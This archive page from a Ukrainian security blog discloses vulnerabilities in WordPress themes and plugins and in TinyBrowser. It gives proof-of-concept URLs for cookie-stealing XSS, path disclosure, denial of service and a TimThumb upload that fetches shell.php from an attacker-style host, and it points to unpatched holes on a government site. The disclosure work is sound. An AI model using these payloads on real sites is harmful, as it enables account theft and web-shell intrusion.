Архів для категорії 'Уразливості'

Численні уразливості в темі Chocolate WP для WordPress

23:58 24.01.2013

Вчора я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Chocolate WP для WordPress. Про що вже повідомив розробникам.

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Chocolate WP для WordPress.

Уразливості в плагінах для WordPress №88

23:58 23.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Myflash, Clockstone та WP Property. Для котрих з’явилися експлоіти. Myflash - це плагін для створення слайдшоу з флешек, Clockstone - це тема движка, WP Property - це плагін для управління списками майна та нерухомості.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на zpd.gov.ua

17:21 23.01.2013

21.07.2012

Сьогодні я знайшов Cross-Site Scripting уразливості на http://zpd.gov.ua - сайті Державної служби України з питань захисту персональних даних. Про що найближчим часом сповіщу адміністрацію сайта.

Сайт використовує Megapolis.Portal Manager, в якому я виявив багато уразливостей (з 2006 по 2012 рік я знайшов чимало дірок в цьому движку). Тому й на ньому також є дірки подібно до сайтів Кабміну, Парламенту та іншим державним сайтам.

І це сайт тієї служби, що захищає персональні дані українців. Риторичне запитання: раз ця служба штрафує за недотримання закону про захист персональних даних, то чи оштрафує вона сама себе, якщо через дірки на їхньому сайті станеться витік персональних даних.

Детальна інформація про уразливості з’явиться пізніше.

23.01.2013

XSS:

Дані уразливості досі не виправлені. Якщо ця служба не може убезпечити власний сайт, то навряд чи вона зможе убезпечити персональні дані громадян України.

IL, XSS, FPD, AoF, DoS і AFU уразливості в темі Daily Edition Mouss для WordPress

23:51 21.01.2013

У січні, 13.01.2013, я знайшов Information Leakage, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Daily Edition Mouss для WordPress.

Раніше була оприлюднена SQL Injection уразливість в Daily Edition Mouss. В якій я знайшов багато нових дірок. Схоже, що це тема Daily Edition від WooThemes, про дірки в якій я писав в 2011 році. Тому окрім SQL injection, в цій темі багато інших уразливостей.

Information Leakage (SQL DB Structure Extraction) (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php

AoF, DoS, AFU уразливості не працюють в останній версії теми (в якій я тестував їх). Це може бути в зв’язку з захистом від AFU дірки в TimThumb. Але вони повинні працювати в ранніх версіях цієї теми.

Уразливі всі версії теми Daily Edition Mouss для WordPress.

Добірка уразливостей

17:26 21.01.2013

В даній добірці уразливості в веб додатках:

  • HP Operations Orchestration, Remote Execution of Arbitrary Code (деталі)
  • Remote code execution and other vulnerabilities in MAKETEXT macro (деталі)
  • Open-Realty CMS 3.x | Cross Site Request Forgery (CSRF) Vulnerability (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities (деталі)
  • WingFTP Server Denial of Service Vulnerability (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Arbitrary File Upload (деталі)
  • CubeCart 3.0.20 (3.0.x) and lower | Multiple SQL Injection Vulnerabilities (деталі)
  • Key Systems Electronic Key Lockers command injection and weak authentication vulnerabilities (деталі)
  • CubeCart 4.4.6 and lower | Open URL Redirection Vulnerability (деталі)
  • CubeCart 5.0.7 and lower | Open URL Redirection Vulnerability (деталі)

Уразливості в плагінах для WordPress №87

23:58 12.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Video Lead Form, Dailyedition mouss та Ads Box. Для котрих з’явилися експлоіти. Video Lead Form - це плагін для розміщення форми замовлення у відео, Dailyedition mouss - це тема движка, Ads Box - це плагін для розміщення реклами.

  • Video Lead Form Plugin Cross-Site Scripting Vulnerabilities which affects Wordpress URL (деталі)
  • WordPress Dailyedition-mouss SQL Injection (деталі)
  • WordPress Ads Box SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в Floating Tweets для WordPress

23:58 11.01.2013

30.08.2012

У серпні, 16.08.2012, я виявив Full path disclosure, Directory Traversal та Cross-Site Scripting уразливості в плагіні Floating Tweets для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в Rokbox.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

11.01.2013

Full path disclosure (WASC-13):

http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets.php
http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets_widget.php
http://site/wp-content/plugins/floating-tweets/skin.php?skin=1

Directory Traversal (Windows) (WASC-33):

http://site/wp-content/plugins/floating-tweets/skin.php?widget_id=2&skin=1\1

DT дозволяє зчитувати лише css-файли (в папці /skins/ та підпапках). При відключених mq можна використати Null Byte Injection, що дозволить через DT зчитувати довільні файли.

XSS (persistent XSS) (WASC-08):

Три persistent XSS дірки. Для атаки потрібно обійти захист від CSRF (параметр savewidgets). Наприклад, використовуючи reflected XSS.

Floating Tweets XSS.html

Floating Tweets XSS-2.html

Floating Tweets XSS-3.html

Приклади атак для даних трьох XSS на IE7 та попереді версії. З використанням MouseOverJacking можна атакувати будь-які браузери (при цьому жертва повинна зробити рух мишкою). Код спрацює одразу при відправці запита і в подальшому при відвідуванні http://site/wp-admin/widgets.php.

Floating Tweets XSS-4.html

Приклад атаки на будь-які браузери. Код виконається на головній і будь-якій зовнішній сторінці сайта.

Уразливі Floating Tweets 1.0.1 та попередні версії.

Добірка уразливостей

17:26 10.01.2013

В даній добірці уразливості в веб додатках:

  • EMC NetWorker Format String Vulnerability (деталі)
  • Multiple SQL Injection Vulnerabilities in Elite Bulletin Board (деталі)
  • Multiple vulnerabilities in Banana Dance (деталі)
  • Symantec Messaging Gateway SSH with backdoor user account (деталі)
  • Log Analyzer 3.6.0 - Cross Site Scripting Vulnerability (деталі)
  • mahara security update (деталі)
  • Symantec Messaging Gateway - Support Backdoor (деталі)
  • MoinMoin vulnerabilities (деталі)
  • mediawiki-extensions security update (деталі)
  • Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability (деталі)

Уразливості в плагінах для WordPress №86

23:57 09.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Simple Gmail Login, List Communities та ArribaLaEsteban. Для котрих з’явилися експлоіти. Simple Gmail Login - це плагін для аутентифікації через логін і пароль до Gmail, List Communities - це плагін для створення спільнот, ArribaLaEsteban - це тема движка.

  • Wordpress Plugin Simple Gmail Login Stack Trace Vulnerability (деталі)
  • WordPress List Communities SQL Injection (деталі)
  • WordPress ArribaLaEsteban SQL Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Численні уразливості в TinyBrowser

23:54 08.01.2013

У грудні, 28.12.2012, я знайшов численні уразливості в TinyBrowser для TinyMCE. Це Information Leakage, Full path disclosure та Cross-Site Scripting уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про Виконання коду в TinyBrowser.

Information Leakage (Directory Listing) (WASC-13):

http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=

http://site/tiny_mce/plugins/tinybrowser/edit.php?type=

Виводиться зміст коренової директорії сайта, якщо немає директорії для завантаження.

Full path disclosure (WASC-13):

В tinybrowser.php і edit.php виводиться FPD якщо немає папки для завантаження.

Якщо завантажити скрипт з розширенням зображення, то також випадають FPD.

XSS (WASC-08):

http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//

Для IE:

http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))

Уразливі старі версії TinyBrowser (такі як 1.33 та попередні версії). В версії TinyBrowser 1.42 дані уразливості вже виправлені.